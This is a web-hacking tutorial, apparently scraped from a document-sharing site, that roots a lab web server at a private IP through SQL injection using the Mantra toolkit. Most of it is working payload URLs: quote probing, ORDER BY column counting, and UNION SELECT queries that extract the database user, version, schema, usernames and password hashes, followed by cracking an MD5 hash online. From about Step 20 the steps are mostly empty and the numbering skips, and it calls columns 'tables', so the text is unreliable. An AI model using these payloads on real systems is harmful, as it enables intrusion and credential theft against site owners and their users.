Beruflich Dokumente
Kultur Dokumente
Hi All,
In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.
Step 1:
Code:
http://192.168.132.128/
Step 2:
I went through all the pages of web site and found a page with URL input
Code:
http://192.168.132.128/?id=13
Step 3:
The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL
and pressing Execute.
Code:
http://192.168.132.128/?id=13'
Since the page content is different from the previous one. I can make sure that the web page is vulnerable.
Step 5:
Code:
http://192.168.132.128/?id=13 order by 1
Step 6:
I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a
tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply
press on + button till I see any changes on the webpage
Code:
http://192.168.132.128/?id=13 order by 7
Step 7:
Code:
http://192.168.132.128/?id=13 order by 7
Step 8:
Code:
http://192.168.132.128/?id=13 order by 8
Step 9:
Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT
Step 10:
I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not
exists and there are only 7 tables
Step 11:
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7
Step 12:
I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7
The current user is cms_user@localhost
Step 13:
Lets find out the version of the database. I replaced 2 in the URL with version() command
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,7
5.0.45 is the version
Step 14:
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from
information_schema.tables
From this list I found "user" is an interesting table
Step 15:
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from
information_schema.columns
Step 16:
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from
information_schema.columns where table_name='user'
Step 17:
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from user
Step 18:
Code:
http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from user
Its encrypted
Step 19:
Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu
> send to > md5.rednoize.com
Step 20:
Greetings.!!!
Step 24:
Step 33:
Step 35:
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
Step 37:
Step 39:
Step 41:
Confirmed.!!!
Step 42:
Step 43: